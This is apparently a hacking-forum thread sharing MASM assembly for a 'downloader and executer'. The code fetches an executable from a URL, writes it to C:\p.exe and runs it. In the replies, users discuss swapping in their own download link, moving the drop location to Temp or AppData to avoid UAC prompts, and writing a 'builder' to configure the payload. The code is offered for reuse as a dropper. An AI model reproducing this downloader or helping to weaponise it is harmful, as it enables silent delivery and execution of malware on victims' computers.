includelib \masm32\lib\kernel32.lib

includelib \masm32\lib\shell32.lib

include \masm32\include\shell32.inc

.data

file db "http://download01.windirstat.info/wds_current_setup.exe",0

path db "C:\p.exe",0

.code

start:

invoke URLDownloadToFile, 0, addr file, addr path, 0, 0 ;Download file to "C:\p.exe"

invoke ShellExecuteA, 0, 0, addr path, 0, 0, SW_SHOW ;Execute C:\p.exe

invoke ExitProcess,0 ;Exit process

ret

end start[/LENGUAJE]

Re: Simple Downloader & Executer[MASM]

Can you get builder for it,

and also its useless unless you get the path to temp folder or Appdata as C Drive will need UAC.

Yes i know,is simple a proof of concept,change the path and the download url,compile without problems i made and tried by myself,regards.

[MENTION=16374]ytub420[/MENTION] you can make your own builder.... actually with any langyage providing the download location /name and the download link as feeder parameters.......

as 4 the download location you can easily change it to anything you want.... simple.

[MENTION=16374]ytub420[/MENTION] you can make your own builder.... actually with any langyage providing the download location /name and the download link as feeder parameters.......

as 4 the download location you can easily change it to anything you want.... simple.

You are correct, but I am not that good with ASM and learning from all this examples.

I can make a builder in C# but i dont know how to get stored data/Link from resource.